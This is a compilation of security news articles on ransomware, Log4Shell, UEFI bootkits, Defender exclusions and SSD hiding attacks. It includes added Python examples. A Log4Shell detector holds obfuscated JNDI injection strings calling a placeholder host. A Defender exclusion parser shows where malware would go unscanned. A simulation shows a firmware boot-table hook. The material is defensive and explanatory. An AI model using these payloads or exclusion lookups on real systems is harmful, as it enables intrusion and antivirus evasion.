
Security Researchers Establish Connections Between 3AM Ransomware and Conti, Royal Cybercriminal Groups

 

Security researchers examining the operations of the recently surfaced 3AM ransomware group have unveiled strong connections with notorious entities like the Conti syndicate and the Royal ransomware gang.

The 3AM ransomware, also known as ThreeAM, has adopted a novel extortion strategy: publicly revealing data leaks to victims' social media followers and utilizing bots to respond to influential accounts on X (formerly Twitter), directing them to the compromised data.

3AM was first documented by Symantec's Threat Hunter Team in mid-September, in an intrusion where the attackers deployed it after their attempt to run LockBit had been blocked. According to French cybersecurity firm Intrinsec, ThreeAM is likely affiliated with the Royal ransomware group, which has since rebranded as BlackSuit and is made up of former members of Team 2 within the Conti syndicate.

As Intrinsec dug into the group, it found substantial overlap in communication channels, infrastructure, and tactics between 3AM and the Conti syndicate. Notably, an IP address listed by Symantec as a network indicator of compromise led the researchers to a PowerShell script on VirusTotal that drops Cobalt Strike.

Further investigation uncovered a SOCKS4 proxy on TCP port 8000, a TLS certificate associated with an RDP service, and HTML content from 3AM's data leak site indexed by Shodan. The servers involved were traced back to Cherry Servers, a Lithuanian hosting company with a history of hosting malware despite carrying a low fraud-risk score.

Intrinsec's findings aligned with a report from Bridewell that connected the same IP subnet to the ALPHV/BlackCat ransomware operation, a group that is not part of the Conti syndicate but is allied with it, and which has been tied to the IcedID malware used in Conti attacks.

Beyond the technical links, Intrinsec documented 3AM's experiment with a new extortion technique. The gang set up a Twitter account in August and used it to reply to tweets from victims and high-profile accounts with links to its data leak site on the Tor network. Intrinsec suspected a Twitter bot was behind the name-and-shame campaign, given the unusually high volume of automated replies.

Despite 3AM's apparent lack of sophistication compared with Royal, the researchers cautioned against underestimating its capacity to run a large number of attacks. The report closes with broader context on the Conti syndicate, its dissolution, and the emergence of spin-off groups such as Royal.

Sophos Says Nearly Every Company Was Attacked Last Year

 


Organizations are under constant bombardment by malicious activity and are suffering for it. In its State of Ransomware 2022 report, Sophos, a global leader in next-generation cybersecurity, gives a comprehensive overview of the real-world ransomware experiences of organizations. According to the report, the share of organizations hit by ransomware rose from 37% in 2020 to 66% in 2021.

For organizations, cyberattacks are not a matter of chance but something to prepare for daily. According to a separate survey released by Sophos on Tuesday, almost all organizations (94%) suffered some form of cyberattack within the last year.

Researchers warned companies to expect to be targets in 2023. Organizations are reeling under the constant barrage of malicious activity aimed at them, and many of the threats facing businesses today have become too advanced for them to respond to on their own. In most cases, organizations report that cyber threats hurt their ability to complete IT projects on time or to devote time to strategic issues.

For the most significant ransomware attack that encrypted an organization's data, the average ransom paid rose almost fivefold to $812,360, and the share of organizations paying ransoms of $1 million or more tripled.

According to John Shier, field CTO of commercial at Sophos, "Many organizations are overwhelmed with routine operational responsibilities as well as strategic initiatives." As a result, they are left reacting to what is happening around them rather than improving their position, because they are constantly on the back foot and distracted by the present.

The State of Ransomware 2022 report is based on a survey of 5,600 IT professionals at mid-sized organizations in 31 countries across Europe, the Americas, Asia-Pacific, Central Asia, the Middle East, and Africa, conducted in January and February 2022. The separate survey released on Tuesday covered respondents in 14 countries.

Almost all respondents (93%) said they find essential security operations tasks challenging, and their security teams investigate only about half of the security alerts they receive. Three-quarters of respondents had difficulty identifying the root cause of attacks.

According to the State of Ransomware 2022 global survey, which examines ransomware incidents in 2021, and cyber insurance issues related to them, the following are the main findings: 

An increase in ransom payments: in 2021, 11% of organizations paid a ransom of $1 million or more, up from 4% in 2020, while the share paying less than $10,000 dropped from 34% in 2020 to 21% in 2021.

In 2021, 46% of organizations whose data was encrypted paid a ransom to get it back. 26% of organizations that restored their data from backups in 2021 paid a ransom as well.

Ransomware attacks carry costs well beyond the ransom. The average cost of recovering from an organization's most significant attack in 2021 was $1.4 million, and recovery from the damage and disruption took about a month. Ninety percent of organizations said the attack disrupted their ability to operate, and 86% of private-sector victims said it cost them business or revenue.

To cover the cost of recovering from a ransomware attack, organizations often rely on cyber insurance. According to the survey, 83% of mid-sized organizations had cyber insurance that covers ransomware. In 98% of incidents the insurer paid at least some of the costs, and in 40% of cases it covered the ransom payment itself.

Ninety-four percent of organizations with cyber insurance said their experience of obtaining coverage had changed over the past 12 months: insurers now demand stronger cybersecurity measures, policies have become more complex or expensive, and fewer providers offer coverage at all.

According to the survey of IT and cybersecurity leaders, five threats are of particular concern: data theft, phishing, ransomware, extortion, and DDoS attacks. Only 1% of IT leaders said they are not worried about cyberattacks affecting their organization in the near future.

Lazarus Hackers are Using Log4j to Hack US Energy Companies

 

A new cyber espionage campaign targeting US, Canadian, and Japanese energy providers has been linked to the North Korean state-sponsored Lazarus hacking group, according to security researchers.

Cisco Talos, Cisco's threat intelligence unit, said Thursday that Lazarus, also tracked as APT38, was observed targeting unnamed energy providers in the United States, Canada, and Japan between February and July of this year.

According to Cisco's findings, the hackers exploited the year-old Log4j vulnerability known as Log4Shell to compromise internet-exposed VMware Horizon servers and gain an initial foothold in a victim's enterprise network, then deployed bespoke malware known as "VSingle" and "YamaBot" to establish long-term persistent access.
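The initial-access step described above is detectable at the web tier: the Log4Shell trigger is a `${jndi:...}` lookup string in any field the vulnerable application logs, and attackers routinely disguise it with nested log4j lookups and URL encoding. The following Python is an added example, not code from Cisco Talos or from this page, that de-obfuscates and flags such lookups in constructed web-server log lines (the IP addresses, paths and payloads are made up for illustration):

```python
import re
from urllib.parse import unquote

# Constructed sample web-server log lines (not from the Talos report): benign traffic to a
# VMware Horizon portal path, a plain Log4Shell probe in the User-Agent, a variant hidden
# behind nested log4j lookups, and a URL-encoded variant in the query string.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2022:10:01:22 +0000] "GET /portal/webclient/index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2022:10:02:05 +0000] "GET /portal/info.jsp HTTP/1.1" 200 88 "-" "${jndi:ldap://203.0.113.9:1389/a}"
203.0.113.7 - - [12/Mar/2022:10:02:09 +0000] "GET /portal/info.jsp HTTP/1.1" 200 88 "-" "${${lower:j}${lower:n}di:${lower:l}dap://203.0.113.9:1389/b}"
203.0.113.7 - - [12/Mar/2022:10:02:13 +0000] "GET /portal/info.jsp?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F203.0.113.9%3A1099%2Fc%7D HTTP/1.1" 200 88 "-" "curl/7.68.0"
"""

# log4j 2.x lookups that evaluate to a literal and are used to split up the word "jndi":
# ${lower:x} and ${upper:x} yield x, and ${anything:-x} yields the default value x.
_OBFUSCATED = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}|\$\{[^{}]*?:-([^{}]*)\}", re.I)
# A JNDI lookup with a scheme JndiLookup can resolve; group 2 captures the callback host.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldap|ldaps|rmi|dns|iiop|corba|nds|http)\s*:/*([^/:}\s]*)", re.I)


def normalize(s: str, rounds: int = 8) -> str:
    """URL-decode, then collapse lookup obfuscation from the inside out until stable."""
    s = unquote(s)
    for _ in range(rounds):
        collapsed = _OBFUSCATED.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), s)
        if collapsed == s:
            break
        s = collapsed
    return s.lower()


def scan_log(text: str) -> list:
    """One finding per line that still carries a JNDI lookup after normalization."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = _JNDI.search(normalize(line))
        if m:
            findings.append({"line": lineno, "source": line.split()[0],
                             "scheme": m.group(1), "callback": m.group(2)})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Matching the whole line rather than one field matters because Horizon, like any log4j application, may log headers, parameters and paths; the callback host is what you block at egress and hunt for in proxy and DNS logs.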

Japan's national CERT, JPCERT/CC, recently linked YamaBot to the Lazarus APT. Symantec first disclosed details of this espionage campaign in April, attributing the operation to "Stonefly," another North Korean hacking group that overlaps with Lazarus.

Cisco Talos also discovered a previously unknown remote access trojan (RAT) called "MagicRAT," attributed to the Lazarus Group and used for reconnaissance and credential theft.

Talos researchers Jung soo An, Asheer Malhotra, and Vitor Ventura wrote: “The main goal of these attacks was likely to establish long-term access into victim networks to conduct espionage operations in support of North Korean government objectives. This activity aligns with historical Lazarus intrusions targeting critical infrastructure and energy companies to establish long-term access to siphon off proprietary intellectual property.”

In recent months, the group has also focused heavily on blockchain and cryptocurrency organisations. It has been linked to the theft of $100 million in cryptocurrency from Harmony's Horizon Bridge and $625 million from the Ronin Network, an Ethereum-based sidechain built for the popular play-to-earn game Axie Infinity.

Pyongyang has long used stolen cryptocurrency and information theft to fund its nuclear weapons programme. In July, the United States raised its reward for information on members of state-sponsored North Korean threat groups, including Lazarus, to $10 million, more than doubling the amount the State Department had announced in April.

The Lazarus Group is a North Korean-backed hacking organisation best known for the 2014 Sony Pictures hack and the 2017 WannaCry ransomware outbreak. Its operations also support North Korea's state objectives, such as military R&D and the evasion of international sanctions.

Zenly Addressed the Risks of User Data Exposure and Account Takeover

 

Zenly, a social app from Snap that lets users follow the positions of friends and family on a live map, had two flaws that could put tracked users at risk: a user-data disclosure vulnerability and an account-takeover vulnerability, according to the Checkmarx Security Research Team.

Zenly is a real-time location-sharing app created in 2015 by Alexis Bonillo and Antoine Martin in Paris. Its main purpose is to share and monitor location with friends, and it can report not only a user's current position but also their direction of travel and speed.

According to Checkmarx, the data-exposure vulnerability is reached through the "Add by Username" flow, which begins with a search for a known username. The requests made during that search can then be inspected using "an environment that permits intercepting and decoding network requests to get visibility into network activities," such as an intercepting proxy.

“By observing the response of the request that was executed on the /UserPublicFriends endpoint, a list of friends can be seen, although it is not displayed on the user interface of the application,” according to the analysis. “This list contains every friend of the user, one of them is Bogus_CEO (bogus CEO of Zenly, for demonstration purposes). Note that the response also contains their username, which could in turn be used to repeat this process and obtain their friends list instead.” 

Once a target's username is known, the same interceptor can be used to obtain the associated phone number: the researchers opened the "Add by Username" view, tapped "Add as Friend," and found the target's phone number in the server's response to the friend request.

Checkmarx's mitigation advice has two parts. The most serious consequence is access to a user's personally identifiable information (PII) without their consent, which can be prevented by removing the target's phone number from the response sent when a friend request is created. The second part is to limit or shape the data returned by the /UserPublicFriends endpoint during a username search, rather than returning the user's entire list of friends' usernames.
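Both mitigation steps come down to the same rule: the server decides what each caller may see, and the client UI is not a security boundary. The Python below is an added illustration written for this page, not Zenly's or Checkmarx's code; the accounts, endpoint behaviour and field names are hypothetical and only mirror the two endpoints described above. It shows the leaky responses beside their shaped replacements, built from a field allowlist, and a small check for PII anywhere in a response:

```python
from dataclasses import dataclass, field


@dataclass
class User:
    user_id: str
    username: str
    phone: str                          # PII: only its owner may ever see it in a response
    friend_ids: set = field(default_factory=set)


# Constructed sample accounts (hypothetical; not real Zenly users).
USERS = {
    "u1": User("u1", "alice", "+33600000001", {"u2", "u3"}),
    "u2": User("u2", "bogus_ceo", "+33600000002", {"u1"}),
    "u3": User("u3", "carol", "+33600000003", {"u1"}),
}
PUBLIC_FIELDS = ("user_id", "username")         # what any authenticated user may learn about another
OWNER_FIELDS = PUBLIC_FIELDS + ("phone",)       # what a user may learn about themselves


def _by_username(username: str) -> User:
    return next(u for u in USERS.values() if u.username == username)


def serialize(user: User, fields: tuple) -> dict:
    """Allowlist serializer: the response is built from the permitted field names, so a new
    attribute added to User later is never exposed by accident."""
    return {f: getattr(user, f) for f in fields}


# --- behaviour the analysis describes (the 'before') ----------------------------------
def user_public_friends_leaky(target_username: str) -> dict:
    """Returns the target's complete friend list and trusts the client UI not to show it."""
    target = _by_username(target_username)
    return {"friends": [serialize(USERS[f], PUBLIC_FIELDS) for f in target.friend_ids]}


def add_friend_leaky(requester_id: str, target_username: str) -> dict:
    """Confirms the friend request with the target's full record, phone number included."""
    target = _by_username(target_username)
    return {"status": "requested", "target": serialize(target, OWNER_FIELDS)}


# --- the two mitigation steps ----------------------------------------------------------
def user_public_friends_hardened(requester_id: str, target_username: str) -> dict:
    """Step 2: shape the data. Only the owner gets the list; anyone else gets a count."""
    target = _by_username(target_username)
    if requester_id == target.user_id:
        return {"friends": [serialize(USERS[f], PUBLIC_FIELDS) for f in target.friend_ids]}
    return {"friend_count": len(target.friend_ids)}


def add_friend_hardened(requester_id: str, target_username: str) -> dict:
    """Step 1: drop the phone field; the requester only needs an identifier for the request."""
    target = _by_username(target_username)
    return {"status": "requested", "target": serialize(target, PUBLIC_FIELDS)}


def contains_key(obj, key: str) -> bool:
    """Walk a JSON-like response and report whether a field name appears anywhere in it."""
    if isinstance(obj, dict):
        return any(k == key or contains_key(v, key) for k, v in obj.items())
    if isinstance(obj, list):
        return any(contains_key(v, key) for v in obj)
    return False


if __name__ == "__main__":
    print("leaky add-friend exposes phone:", contains_key(add_friend_leaky("u3", "bogus_ceo"), "phone"))
    print("hardened add-friend exposes phone:", contains_key(add_friend_hardened("u3", "bogus_ceo"), "phone"))
    print("stranger sees:", user_public_friends_hardened("u3", "alice"))
```

A check like `contains_key` belongs in the API's integration tests, run against every endpoint with a non-owner session, so a regression that reintroduces the field fails the build rather than shipping.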

According to Checkmarx, the second bug is in the user-authentication flow, which validates sessions with verification codes sent by SMS. After the SMS is sent, the app submits the session token together with the SMS verification code to the /SessionVerify endpoint.

Both vulnerabilities have been fixed, and users should update their apps to the most recent version to avoid compromise, according to the company.

Several Vulnerabilities were Discovered in the Snap-Confine Function on Linux Systems

 

Security researchers from Qualys uncovered several flaws in Canonical's Snap software packaging and deployment system. Bharat Jogi, head of vulnerability and threat research at Qualys, wrote in a blog post that the team found multiple vulnerabilities in the snap-confine program on Linux systems, "the most important of which can be abused to escalate privilege to gain root rights."

Snap is Canonical's packaging and distribution mechanism for Linux-based operating systems. The packages, called snaps, and the tool that installs and runs them, snapd, work across a range of Linux distributions and let upstream developers ship their applications directly to users. Snaps are self-contained applications that run in a sandbox with mediated access to the host system. snap-confine is the program snapd uses internally to set up the execution environment for snap applications.

Successful exploitation lets any unprivileged local user gain root privileges on a vulnerable system. Qualys researchers independently verified the vulnerability, developed an exploit, and obtained full root access on default Ubuntu installations. Canonical followed responsible disclosure and coordinated with vendors and open-source distributions to announce the vulnerability once the Qualys Research Team had confirmed it.

Canonical, the publisher of Ubuntu, said in a statement that it tries to ensure the subsystems the snap platform relies on are used safely throughout development, and noted that, thanks to automatic refreshes, most snap-based installations worldwide had already been updated.

Qualys also found six further vulnerabilities, which it detailed individually while urging all users to patch as soon as possible. “Unfortunately, such a modern confinement platform involves many subsystems, and sometimes we make mistakes. Thankfully, Canonical and Ubuntu are part of a large community that includes competent security researchers. Recently, Qualys informed us that one of the tools that is part of the snap platform contains a security issue,” a Canonical spokesperson said.

“In their words: Discovering and exploiting a vulnerability in snap-confine has been extremely challenging (especially in a default installation of Ubuntu), because snap-confine uses a very defensive programming style, AppArmor profiles, seccomp filters, mount namespaces, and two Go helper programs,” the spokesperson added.

APT41 Used the New MoonBounce UEFI Malware in Targeted Attacks

 

A new firmware bootkit found in the wild shows remarkable advances over earlier tools of its kind, according to the Kaspersky researchers who discovered it. MoonBounce is a malicious implant that hides in a computer's UEFI firmware in the SPI flash chip on the motherboard, a storage component separate from the hard drive, which makes it hard to remove and hard for security products to detect. UEFI is the specification that governs how a computer's firmware and operating system (OS) interoperate.

Placing malicious code in the firmware as a "UEFI bootkit" is an ideal way to avoid detection by antivirus software and other security measures running at the OS level. It has been done before, with the FinFisher malware and the ESPecter backdoor as two recent instances. These tools hijack the boot sequence so that they run before the operating system's security components are initialized. They are extremely persistent because they live in places a normal OS reinstall does not touch: FinFisher and ESPecter reside on the EFI System Partition on disk, while MoonBounce goes further and lives in SPI flash, which survives even a disk replacement.

"The source of the infection starts with a set of hooks that intercept the execution of several functions in the EFI Boot Services Table, namely AllocatePool, CreateEventEx, and ExitBootServices," explains Kaspersky in the report. "Those hooks are used to divert the flow of these functions to malicious shellcode that is appended by the attackers to the CORE_DXE image, which in turn sets up additional hooks in subsequent components of the boot chain, namely the Windows loader." 

MoonBounce is the third SPI-flash firmware bootkit found in the wild, after LoJax and MosaicRegressor, and shows "substantial development, with a more sophisticated attack flow and better technical sophistication" compared with its predecessors. Kaspersky found it in 2021 with its Firmware Scanner, which is designed to detect threats hidden in the ROM BIOS, including UEFI firmware images.
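The hooks Kaspersky describes above are function-pointer substitutions in a table that every later boot component calls through, combined with code appended to the CORE_DXE image. The Python below is an added simulation written for this page, not Kaspersky's tooling or MoonBounce code; its "firmware image" is a constructed byte string and its "pointers" are offsets into it. It shows how such a hook keeps the boot working while diverting AllocatePool, and the two checks a firmware scanner relies on to catch it: the image no longer matches its golden hash, and a table entry points outside the measured image:

```python
import hashlib


class Firmware:
    """Stand-in for a DXE-phase firmware image plus its EFI Boot Services Table. The image is a
    byte string, 'function pointers' are offsets into it, and handlers[offset] is what executing
    the code at that offset does in this simulation."""

    def __init__(self):
        self.image = bytearray()
        self.handlers = {}
        self.boot_services = {}            # service name -> offset: the simulated table

    def add_code(self, code: bytes, handler) -> int:
        offset = len(self.image)
        self.image += code
        self.handlers[offset] = handler
        return offset

    def call(self, service: str, *args):
        """Later boot components (e.g. the Windows loader) reach firmware only via the table."""
        return self.handlers[self.boot_services[service]](*args)


def build_firmware() -> Firmware:
    """Constructed CORE_DXE with three services; the code bytes are placeholders, not real x86."""
    fw = Firmware()
    pool = []
    fw.boot_services["AllocatePool"] = fw.add_code(
        b"\x55\x48\x89\xe5" * 4, lambda size: (pool.append(size), len(pool) - 1)[1])
    fw.boot_services["CreateEventEx"] = fw.add_code(b"\x55\x48\x89\xe5" * 2, lambda: "event")
    fw.boot_services["ExitBootServices"] = fw.add_code(b"\x55\x48\x89\xe5" * 3, lambda: "handoff")
    return fw


def measure(fw: Firmware) -> dict:
    """Golden measurement taken from a known-clean image: hash, size and table contents."""
    return {"sha256": hashlib.sha256(fw.image).hexdigest(),
            "size": len(fw.image), "table": dict(fw.boot_services)}


def implant(fw: Firmware) -> list:
    """MoonBounce-style hook: append shellcode to the image and repoint AllocatePool at it; the
    hook trampolines to the original so the boot chain keeps working."""
    original = fw.boot_services["AllocatePool"]
    observed = []

    def hook(size):
        observed.append(size)              # a real implant stages its next component here
        return fw.handlers[original](size)

    fw.boot_services["AllocatePool"] = fw.add_code(b"\x90" * 16, hook)
    return observed


def verify(fw: Firmware, golden: dict) -> list:
    """What a firmware scanner checks: the image hash, and that every table entry points into
    the measured image at its expected location."""
    findings = []
    if hashlib.sha256(fw.image).hexdigest() != golden["sha256"]:
        findings.append("image hash mismatch")
    for name, offset in fw.boot_services.items():
        if offset >= golden["size"]:
            findings.append(f"{name} points outside the measured image")
        elif offset != golden["table"][name]:
            findings.append(f"{name} repointed")
    return findings


if __name__ == "__main__":
    fw = build_firmware()
    golden = measure(fw)
    print("clean:", verify(fw, golden))
    implant(fw)
    print("loader still gets memory:", fw.call("AllocatePool", 64))
    print("after implant:", verify(fw, golden))
```

On real hardware the golden measurement is the vendor's signed image or the TPM's recorded boot measurements; the simulation only shows why a hash of the flash contents and a pointer-range check together are enough to expose an appended hook even when the machine boots normally.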

Kaspersky found ample evidence linking MoonBounce to APT41, from the deployment of the ScrambleCross malware to unique certificates recovered from its C2 servers that match earlier FBI reports on APT41 activity. Although the United States Department of Justice indicted five APT41 members in September 2020, the presence of MoonBounce and the operation around it shows that the group was not deterred by the legal pressure.

Telemetry indicates the attacks were highly targeted; Kaspersky detected the firmware rootkit on only one occasion. It found several other malware samples and loaders on other devices in the same network, but these were not UEFI implants: examples include the Microcin backdoor, the Mimikatz credential stealer, a Go implant, the StealthMutant loader, and ScrambleCross.

Because of a Flaw in Microsoft Defender, Threat Actors can Evade Detection

 

A weakness in Microsoft Defender antivirus on Windows lets threat actors discover which locations are not scanned and plant malware there. According to several users, the issue has existed for at least eight years and affects both Windows 10 21H1 and Windows 10 21H2. According to security researchers, the list of locations Microsoft Defender does not scan is not protected and can be read by any local user.

Windows Defender is an anti-malware component of Microsoft Windows. It was first made available as a free anti-spyware download for Windows XP, and it was then bundled with Windows Vista and Windows 7. It has evolved into a full antivirus solution, replacing Microsoft Security Essentials in Windows 8 and later editions. 

Local users, whatever their privileges, can query the registry to see which paths Microsoft Defender is not allowed to check for malware or dangerous files. According to Antonio Cocomazzi, the SentinelOne threat researcher who reported the RemotePotato0 vulnerability, this sensitive information has no protection, and a simple "reg query" command reveals everything Microsoft Defender is told not to scan, whether files, folders, extensions, or processes.

Like any antivirus product, Microsoft Defender lets customers specify which local or network locations should be excluded from malware scanning. Exclusions are routinely used to stop the antivirus from interfering with legitimate applications it has incorrectly flagged as malware. Because the exclusion list differs from system to system, it is valuable to an attacker who is already on the machine: it tells them where they can drop harmful files without fear of detection.
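The exclusion list Cocomazzi describes lives under HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions, with Paths, Extensions and Processes subkeys. The Python below is an added example for this page, not code from SentinelOne or BleepingComputer; it parses constructed `reg query` output in the shape the command prints (the exclusion values themselves are hypothetical) and answers the question an attacker on the box would ask, namely why a file written at a given path would go unscanned, which is also exactly what a defender should review to shrink the exclusions:

```python
import fnmatch
import ntpath
import re

# Constructed `reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions" /s` output
# in the layout the command prints. The key names are Defender's real ones; the values
# under them are hypothetical.
REG_QUERY_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
    C:\Build\Agent    REG_DWORD    0x0
    D:\SQLData\*.mdf    REG_DWORD    0x0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions
    .log    REG_DWORD    0x0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes
    backup.exe    REG_DWORD    0x0
"""


def parse_exclusions(text: str) -> dict:
    """Group value names under the Paths/Extensions/Processes subkeys of Exclusions."""
    exclusions = {"Paths": [], "Extensions": [], "Processes": []}
    current = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("HKEY_"):
            current = line.rstrip("\\").rsplit("\\", 1)[-1]
            continue
        parts = re.split(r"\s{4,}", line.strip())      # reg query separates columns by 4 spaces
        if current in exclusions and len(parts) >= 2:
            exclusions[current].append(parts[0])
    return exclusions


def why_unscanned(path: str, exclusions: dict) -> list:
    """Reasons Defender would skip on-access scanning of a file written at `path`."""
    p = ntpath.normcase(path)                          # Windows paths are case-insensitive
    reasons = []
    for rule in exclusions["Paths"]:
        r = ntpath.normcase(rule)
        if any(ch in r for ch in "*?"):
            if fnmatch.fnmatchcase(p, r):
                reasons.append(f"path matches wildcard exclusion {rule}")
        elif p == r or p.startswith(r.rstrip("\\") + "\\"):
            reasons.append(f"path is under excluded folder {rule}")
    ext = ntpath.splitext(p)[1]
    for rule in exclusions["Extensions"]:
        if ext == ntpath.normcase(rule if rule.startswith(".") else "." + rule):
            reasons.append(f"extension matches exclusion {rule}")
    return reasons


if __name__ == "__main__":
    exc = parse_exclusions(REG_QUERY_OUTPUT)
    for candidate in (r"C:\Build\Agent\tools\dropper.exe", r"C:\Users\Public\dropper.exe",
                      r"C:\Temp\payload.log", r"D:\SQLData\evil.mdf"):
        print(candidate, "->", why_unscanned(candidate, exc) or ["would be scanned"])
```

The Processes exclusions are parsed but deliberately not applied by `why_unscanned`: a process exclusion suppresses scanning of whatever that process opens, so its effect depends on which process writes the file, not on the path. Any exclusion that a low-privileged user can both read and write into is one to remove or narrow.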

Microsoft Defender Antivirus on Windows Server 2016 and Windows Server 2019 additionally applies automatic exclusions based on the roles installed on the server. These automatic exclusions are not shown in the standard exclusion lists; exclusions for operating system files and server roles are applied automatically because Microsoft Defender Antivirus is built into Windows Server 2016 and later, while custom exclusions can still be defined by administrators.

Although a threat actor needs local access to read the Microsoft Defender exclusion list, that is hardly a barrier: many attackers are already inside compromised business networks looking for a way to move laterally as quietly as possible.

According to BleepingComputer, the flaw was reported in May by researcher Paul Bolton. Because Microsoft has yet to fix it, security researchers recommend that administrators configure Microsoft Defender through Group Policy when building their systems.

Firmware Attacks can Leave Persistent Malware in the SSD's Hidden Section

 

Korean researchers have devised a set of attacks against some solid-state drives (SSDs) that could let malware be planted in a location beyond the reach of both the user and security solutions. The attack models target drives with a flex-capacity feature and aim at a hidden area of the device known as over-provisioning, which SSD manufacturers now use widely to improve the performance of NAND flash-based storage.

The over-provisioning area is invisible to the operating system and to any applications running on it, including security and anti-virus software. The SSD controller dynamically adjusts this space against the workload as the user runs different applications, depending on how write- or read-intensive they are.

Flex capacity is a feature of Micron Technology SSDs that lets the drive automatically adjust the split between raw and user-allocated space to improve performance by absorbing bursts of writes. It is a dynamic system that creates and resizes a buffer that typically occupies between 7% and 25% of total disk capacity.

Hardware-level attacks offer the highest degree of persistence and stealth. In the past, sophisticated actors went to great lengths to pull this off against HDDs, hiding malicious code in disk sectors the OS cannot reach. One attack modelled by the researchers at Korea University in Seoul targets the invalid-data area, holding data that has not been erased, that sits between the usable SSD space and the over-provisioning (OP) area; its size depends on the sizes of those two. According to the paper, an attacker can change the size of the OP area through the firmware manager, creating an exploitable invalid-data space.

In a second attack model, the OP region is used as a covert location where a threat actor can hide malware that users cannot monitor or remove. According to the research article, "It is assumed that two storage devices SSD1 and SSD2 are connected to a channel in order to simplify the description. Each storage device has 50% OP area. After the hacker stores the malware code in SSD2, they immediately reduce the OP area of SSD1 to 25% and expand the OP area of SSD2 to 75%." 

"At this time, the malware code is included in the hidden area of SSD2. A hacker who gains access to the SSD can activate the embedded malware code at any time by resizing the OP area. Since normal users maintain 100% user area on the channel, it will not be easy to detect such malicious behaviour of hackers," the article added.

To counter the first type of attack, the researchers advise SSD manufacturers to wipe the OP area with a pseudo-erase algorithm that does not affect real-time performance. Against the second type, implementing systems that monitor the valid-to-invalid data ratio inside SSDs in real time is a potentially effective defence against malware injected into the OP area.